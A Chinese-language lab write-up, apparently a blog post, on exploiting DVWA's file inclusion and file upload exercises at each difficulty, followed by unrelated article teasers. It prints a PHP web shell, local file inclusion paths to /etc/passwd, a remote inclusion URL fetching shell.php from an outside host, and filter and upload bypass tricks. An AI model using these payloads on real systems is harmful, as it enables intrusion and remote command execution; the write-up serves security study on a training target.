当前位置：首页 > news >正文

dvwa：文件包含、文件上传

news 2025/12/15 9:41:00

文件包含

本地文件包含（敏感信息泄露）和远程文件包含（命令执行）

本地文件包含一般包含一些本地的敏感文件，如：/etc/passwd或/etc/shadow等

远程文件包含能使得服务器代码执行，如包含黑客vps的http://192.168.72.162:8000/shell.php文件，而文件内容如下：<?php system('whoami')?>

测试环境

本地文件包含不用什么测试环境，只要有个文件，就能知道其是否触发，远程文件包含需要我们写个php代码，如下

<?php
echo "this is the remote file"."\n";
system($_GET['a']);
?>

然后python -m http.server 开个服务器，让dvwa能包含我们的php代码

easy

linux服务下的本地文件包含

../../../../../../etc/passwd

windows服务下的本地文件包含

我的php网站部署在F盘，在F盘下放一个test.txt

../../../../../../test.txt能将文件读出
或者直接绝对路径：

C:/Windows/system.ini

远程文件包含

http://www.oswe.com/dvwa/vulnerabilities/fi/?page=http://192.168.72.162:8000/shell.php&a=whoami

访问成功如下图：

medium

$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

方法1：
直接输入绝对路径
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=F:/test.txt
正常输出

方法2：双写绕过
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=
..././..././..././..././..././..././..././..././test.txt

http://www.oswe.com/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.72.162:8000/shell.php&a=whoami

high

if( !fnmatch( "file*", $file ) && $file != "include.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}

上面的逻辑是，如果参数没有file字符串，且不是include.php，直接过滤，所以这个情况不能使用远程文件包含了
我们通过伪协议file bypass

page=file:///C:/Windows/system.ini或
page=file:///../../../../../../../../test.txt

impossible

if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}

后台只允许包含这4个文件

文件上传

文件上传只有medium、high、impossible三种难度

准备个php脚本

<?php
system($_GET['a']);
?>

medium

检测：请求头

抓包，修改数据包，直接过
Content-Type: image/jpeg

high

检测：后缀是否为jpg、jpeg、png

上传
shell.php.jpg或shell.php.png都能被解析为php文件（总感觉哪里很怪）

impossible

imagecreatefrompng
imagecreatefromjpeg
由文件或url创建一个新图像，如果解析图像失败会报错

上传的文件会成为md5值.png或md5值.jpg的形式，web服务器不会将其解析为php文件

dvwa：文件包含、文件上传

文件包含本地文件包含（敏感信息泄露）和远程文件包含（命令执行） 本地文件包含一般包含一些本地的敏感文件，如：/etc/passwd或/etc/shadow等远程文件包含能使得服务器代码执行，如包含黑客vps的…...

编程日记 2024/10/10 14:37:14

基于 C# .NET Framework 4.0 开发实现 WCF 服务实例详解（二）——实现Windows服务内嵌WCF服务

目录引言 1. 创建一个新的Windows服务项目 2. 添加WCF服务 2.1 添加服务接口和实现 2.2 添加服务配置 3. 实现Windows服务 3.1 修改Service1类 3.2 在项目中添加ServiceInstaller 4. 安装和运行Windows服务 4.1 编译项目 4.2 使用InstallUtil.exe安装服务 …...

编程日记 2024/10/10 14:36:13

代码示例 private static string[] run_conda_process(string command, Action<string> on_msg, CancellationTokenSource cancel){if (string.IsNullOrEmpty(command)){return new string[]{null,ArcGIS.Desktop.Internal.Core.Conda.Resources.Error_Unexpected + &qu…...

编程日记 2024/10/10 14:35:12

06_23 种设计模式之《适配器模式》

文章目录一、适配器模式基础知识实例一、适配器模式基础知识适配器模式定义：将一个类的接口转换成客户希望的另一个接口。适配器模式使得原本由于接口不兼容而不能一起工作的那些类可以一起工作。 Client：客户端，调用自已需要的领域接口…...

编程日记 2024/10/10 14:34:10

Go语言--快速入门

Go语言特点我们先看一下简单的Go语言程序 package mainimport "fmt"func main() { // 错误，{ 不能在单独的行上fmt.Println("Hello, World!") }我们可以看到外型非常像我们的JAVA，但是不需要；作为结尾，…...

编程日记 2024/10/10 14:33:09

京东云主机怎么用？使用京东云服务器建网站（图文教程）

京东云主机怎么用？非常简单，本文京东云服务器网jdyfwq.com使用以使用京东云服务器搭建WordPress博客网站为例，来详细说下京东云主机的使用方法。使用京东云服务器快速搭建WordPress网站教程，3分钟基于应用镜像一键搞定&#xff0c…...

编程日记 2024/10/10 14:32:07

Linux 基础入门操作-实验七进程的介绍

实验七进程的介绍 7.1 进程基础概念 Linux进程在内存中包含三部分数据：码段、堆栈段和数据段。代码段存放了程序的代码。代码段可以为机器中运行同一程序的数个进程共享。堆栈段存放的是子程序的返回地址、子程序的参数及程序的局部变量。而数据段则存放程序的全…...

编程日记 2024/10/10 14:29:02

SQL进阶技巧：SQL中的正则表达式应用？

目录 0 引言 1. 正则表达式函数 1.1 regexp_extract 1.2 regexp_replace 1.3 regexp_like 2. 在WHERE子句中使用正则表达式 3. 在GROUP BY中使用正则表达式 4. 性能考虑 5. 高级正则表达式技巧 5.1 使用正则表达式进行数据清洗 5.2 使用正则表达式处理JSON 6. 正则…...

编程日记 2024/10/10 14:26:59

算法数组面试理论

数组是存放在连续内存空间内的相同类型数据的集合 （所以在删除添加元素的时候需要移动其他的元素的地址） 数组的元素是不能删除的，只能覆盖。（因为内存地址是连续的，所以不能删除。或者可以这么理解：在一…...

编程日记 2024/10/10 14:24:53

ASP.NET Zero是什么？适合哪些业务场景？

一、ASP.NET Zero是什么？ ASP.NET Zero 是一个基于 ASP.NET Boilerplate (ABP) 框架的模板项目，它提供了预建的页面和强大的基础设施架构，以便开发者能够快速开发应用层。它的特点包括但不限于： 多合一解决方案：提供多…...

编程日记 2024/10/10 14:21:49

获取期货股票分钟级别数据以及均线策略

【数据获取】银河金融数据库（yinhedata.com） 能够获取国内外金融股票、期货历史行情数据，包含各分钟级别。【搭建策略】均线策略作为一种广泛应用于股票、期货等市场的技术分析方法，凭借其简单易懂、操作性强等特点&#xf…...

编程日记 2024/10/10 14:20:47

入门篇-1 数据结构简介

数据结构简介在计算机科学中，数据结构是指组织、存储和管理数据的方式，它使得数据可以被高效地访问和修改。数据结构是计算机程序设计和算法分析中的一个重要概念，因为它们直接影响到程序的执行效率和内存使用。 1. 什么是数据结构&#x…...

编程日记 2024/10/10 14:18:43

Anaconda安装

1.进入Anaconda官网 2.填写邮箱信息 3.在邮箱消息中获取下载链接 4.进入下载页面，选择合适版本下载 5.进入Anaconda安装界面 6.点击“I agree” 7.选择个人即可“Just Me” 8.选择文件安装路径 9.允许创建快捷方式 10.等待下载 11.完成安装...

编程日记 2024/10/10 14:16:38

Elasticsearch学习笔记(六）使用集群令牌将新加点加入集群

随着业务的增长，陆续会有新的节点需要加入集群。当我们在集群中的某个节点上使用命令生成令牌时会出现报错信息。 # 生成令牌 /usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s node出现报错信息： Unable to create enrollment…...

编程日记 2024/10/10 14:14:34

项目建设方案，软件技术方案，整体技术方案，软件建设文档编制（word原件）

1 引言 1.1 编写目的 1.2 项目概述 1.3 名词解释 2 项目背景 3 业务分析 3.1 业务需求 3.2 业务需求分析与解决思路 3.3 数据需求分析【可选】 4 项目建设总体规划【可选】 4.1 系统定位【可选】 4.2 系统建设规划 5 建设目标 5.1 总体目标 5.2 分阶段目标【可选】 5.2.1 业务目…...

编程日记 2024/10/10 14:13:32

vue3定义组件

在Vue 3中，定义组件有多种方式，包括使用单文件组件（Single File Components, SFC）、使用JavaScript对象定义组件、以及使用组合式API（Composition API）。 1. 单文件组件（SFC） 这是…...

编程日记 2024/10/10 14:12:30

BOM常见操作方法汇总

BOM（Browser Object Model，浏览器对象模型）提供了与浏览器窗口交互的方法和属性。BOM 包括了许多对象，如 window、location、history、navigator 等，这些对象提供了与浏览器窗口相关的各种功能。以下是一些常见的 BO…...

编程日记 2024/10/10 14:11:29

Python+whisper/vosk实现语音识别

目录一、Whisper 1、Whisper介绍 2、安装Whisper 3、使用Whisper-base模型 4、使用Whisper-large-v3-turbo模型二、vosk 1、Vosk介绍 2、vosk安装 3、使用vosk 三、总结一、Whisper 1、Whisper介绍 Whisper 是一个由 OpenAI 开发的人工智能语音识别模型&#xf…...

编程日记 2024/10/10 14:10:28

如何在算家云搭建LivePortrait（视频生成）

一、LivePortrait简介 LivePortrait 是一个可控人像视频生成框架，能够准确、实时地将驱动视频的表情、姿态迁移到静态或动态人像视频上，生成极具表现力的视频结果。该项目的模型产生了定性肖像动画。只要输入一张静态的肖像图像，我们的模型…...

编程日记 2024/10/10 14:09:26

CSS 命名规范及 BEM 在前端开发中的实践

一：CSS命名规范的重要性 1、提高代码可读性对于开发者自身来说，遵循规范的命名可以让你在日后回顾代码时，快速理解每个样式类的用途。例如，使用 “.header-logo” 这样的命名，一眼就能看出是头部的 logo 元素的样式，而不是一些无意义的命名如 “.box1”。当团队协作开发…...

编程日记 2024/10/10 14:07:22

阿里云ACP云计算备考笔记 (5)——弹性伸缩

目录第一章概述第二章弹性伸缩简介 1、弹性伸缩 2、垂直伸缩 3、优势 4、应用场景 ① 无规律的业务量波动 ② 有规律的业务量波动 ③ 无明显业务量波动 ④ 混合型业务 ⑤ 消息通知 ⑥ 生命周期挂钩 ⑦ 自定义方式 ⑧ 滚的升级 5、使用限制第三章主要定义 …...

编程新知 2025/12/13 20:13:30

智慧工地云平台源码，基于微服务架构+Java+Spring Cloud +UniApp +MySql

智慧工地管理云平台系统，智慧工地全套源码，java版智慧工地源码，支持PC端、大屏端、移动端。智慧工地聚焦建筑行业的市场需求，提供“平台网络终端”的整体解决方案，提供劳务管理、视频管理、智能监测、绿色施工、安全管…...

编程新知 2025/12/13 13:27:37

Mybatis逆向工程，动态创建实体类、条件扩展类、Mapper接口、Mapper.xml映射文件

今天呢，博主的学习进度也是步入了Java Mybatis 框架，目前正在逐步杨帆旗航。那么接下来就给大家出一期有关 Mybatis 逆向工程的教学，希望能对大家有所帮助，也特别欢迎大家指点不足之处，小生很乐意接受正确的建议&…...

编程新知 2025/12/9 6:43:48

【位运算】消失的两个数字（hard）

消失的两个数字（hard） 题⽬描述：解法（位运算）：Java 算法代码：更简便代码题⽬链接：⾯试题 17.19. 消失的两个数字题⽬描述： 给定⼀个数组，包含从 1 到 N 所有…...

编程新知 2025/11/15 16:18:24

（二）TensorRT-LLM | 模型导出（v0.20.0rc3）

0. 概述上一节对安装和使用有个基本介绍。根据这个 issue 的描述，后续 TensorRT-LLM 团队可能更专注于更新和维护 pytorch backend。但 tensorrt backend 作为先前一直开发的工作，其中包含了大量可以学习的地方。本文主要看看它导出模型的部分&#x…...

编程新知 2025/12/13 6:34:06

微信小程序 - 手机震动

一、界面 <button type"primary" bindtap"shortVibrate">短震动</button> <button type"primary" bindtap"longVibrate">长震动</button> 二、js逻辑代码注：文档 https://developers.weixin.qq…...

编程新知 2025/12/15 8:43:18